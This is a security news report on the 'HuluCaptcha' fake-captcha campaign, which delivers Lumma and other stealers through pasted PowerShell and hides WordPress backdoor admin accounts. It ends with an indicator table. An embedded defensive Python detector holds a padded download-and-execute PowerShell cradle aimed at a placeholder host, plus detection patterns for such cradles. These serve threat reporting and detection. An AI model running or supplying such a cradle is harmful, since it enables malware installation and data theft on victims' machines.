Security researchers have identified a sophisticated fake captcha attack framework dubbed “HuluCaptcha” that tricks users into executing malicious PowerShell commands through the Windows Run dialog, leading to the deployment of information-stealing malware including Lumma Stealer and Aurotun Stealer.
The campaign begins when users visit compromised websites that redirect them to pages imitating legitimate Cloudflare security checks.
These fake captcha interfaces instruct victims to copy and paste PowerShell commands into the Windows Run command box (Win+R) under the guise of verifying their humanity.
The malicious JavaScript injection occurs through compromised WordPress sites, where attackers deploy sophisticated backdoors to maintain persistent access.
Advanced Tracking
The HuluCaptcha framework employs multiple layers of victim tracking and environmental checks before deployment.
The malicious code performs reconnaissance on the target system, specifically checking for Windows 10 operating systems and compatible browser versions including Microsoft Edge (v120-139), Google Chrome (v120-139), and Mozilla Firefox (v130-149). Only victims meeting these criteria are redirected to the fake captcha pages.

The framework includes comprehensive logging capabilities that track user interactions throughout the attack chain.
When victims click the captcha verification button, the system sends a “✅ Verify Clicked” message to tracking endpoints.
The code monitors for Windows key combinations and attempts to detect when users execute the fraudulent commands by tracking browser focus loss events.
Upon successful payload execution, the tracking server receives confirmation through IP-based verification mechanisms.
Payload Generation
Researchers discovered an unused but sophisticated payload generation system within the framework that creates randomized PowerShell commands to evade detection.
The system selects from nine different domains and ten command variations, potentially generating up to 90 unique payload combinations.
Commands are padded with whitespace characters so that the malicious portion is pushed out of view in the Windows Run dialog, making it harder for victims to notice what they are executing.
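A defender-side check for the two traits just described, whitespace padding and a script interpreter launched from the Run dialog, written as an added example rather than code from the report or the framework. It scores Run-dialog history entries; the input is a constructed sample shaped like the RunMRU registry values, and the scoring threshold, keyword list and domain are assumptions.

```python
import re
from dataclasses import dataclass

# Constructed Win+R history shaped like RunMRU registry values (under
# HKCU\...\Explorer\RunMRU, each command with a trailing "\1"). Entries,
# domain and padding are invented for this example, not from the campaign.
SAMPLE_RUNMRU = {
    "a": "notepad\\1",
    "b": "mmc compmgmt.msc\\1",
    "c": " " * 35 + "powershell -w hidden -c \"iex(iwr 'http://payload.invalid/a')\"\\1",
    "d": "cmd /c \"echo I am not a robot\"\\1",
}

# Interpreters that paste-and-run lures launch from the Run box, plus tokens
# typical of a download-and-execute cradle or of window hiding.
INTERPRETERS = re.compile(r"^(?:powershell|pwsh|mshta|cmd|wscript|cscript|rundll32)\b", re.I)
CRADLE_HINTS = re.compile(
    r"\b(?:iex|invoke-expression|iwr|invoke-webrequest|downloadstring|frombase64string)\b"
    r"|-enc\w*|-w(?:indow\w*)?\s+h\w*|https?://",
    re.I,
)

@dataclass
class Finding:
    key: str
    padding: int   # leading whitespace characters stripped before scoring
    score: int
    reasons: list
def score_entry(key, raw, pad_threshold=8):
    """Score one RunMRU value; a Finding is returned once the score reaches 3."""
    value = raw[:-2] if raw.endswith("\\1") else raw
    stripped = value.lstrip(" \t")
    padding = len(value) - len(stripped)
    score, reasons = 0, []
    if padding >= pad_threshold:
        score += 2
        reasons.append(f"{padding} leading whitespace chars push the command out of view")
    if INTERPRETERS.search(stripped):
        score += 1
        reasons.append("script interpreter launched from the Run dialog")
        hits = sorted({m.group(0).lower() for m in CRADLE_HINTS.finditer(stripped)})
        if hits:
            score += 2
            reasons.append("cradle tokens: " + ", ".join(hits))
    return Finding(key, padding, score, reasons) if score >= 3 else None

def scan_runmru(entries):
    """Findings for every suspicious Run-dialog entry, highest score first."""
    found = filter(None, (score_entry(k, v) for k, v in entries.items()))
    return sorted(found, key=lambda f: -f.score)
```

On a live host the same function can be fed the values read from the RunMRU key; an interpreter launch alone (entry "d") stays below the threshold so routine admin use is not flagged.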
The attack infrastructure spans multiple domains serving different functions. Initial redirection occurs through domains like analytiwave[.]com and goclouder[.]com, while fake captcha pages are hosted on security-themed subdomains mimicking Cloudflare services.
Payloads are delivered from domains such as amoliera[.]com and sopeited[.]com and their variants.
The framework also includes an apparent affiliate tracking system designed to monitor infection success rates across different distribution channels.
Investigation of compromised servers revealed sophisticated WordPress backdoors deployed as plugins with names like “core-handler” and “core-handler2.”
These backdoors create hidden administrator accounts (“backupsystems” and “adminbackup”) that remain invisible in standard WordPress admin interfaces.
The backdoors implement extensive hiding mechanisms, modifying SQL queries to exclude the malicious accounts from user listings, search results, and REST API responses.
They also include persistence mechanisms that automatically recreate accounts and reactivate plugins if removed.
The backdoors contain Russian language comments in their source code, suggesting possible attribution, though these were later removed in subsequent versions.
Multiple WordPress sites have reported similar infections through community forums, indicating an ongoing campaign affecting numerous targets.
Indicators of Compromise (IOCs)
| Category | Indicators |
|---|---|
| Compromised Sites | dvir[.]de, andoks[.]com[.]ph, losangelescrc[.]usc[.]edu, woodslabs[.]ca |
| Redirect Domains | analytiwave[.]com, goclouder[.]com, stat[.]bundlehulu[.]com, sharecloud[.]click |
| Fake Captcha Pages | security[.]flargyard[.]com, security[.]claufgaurd[.]com, security[.]cloudstwr[.]com |
| Payload Servers | amoliera[.]com, sopeited[.]com, fopelas[.]com, elomaio[.]com |
| C2 Infrastructure | 91.200.14[.]69:7712, uplink-routes[.]asia, westrosei[.]live |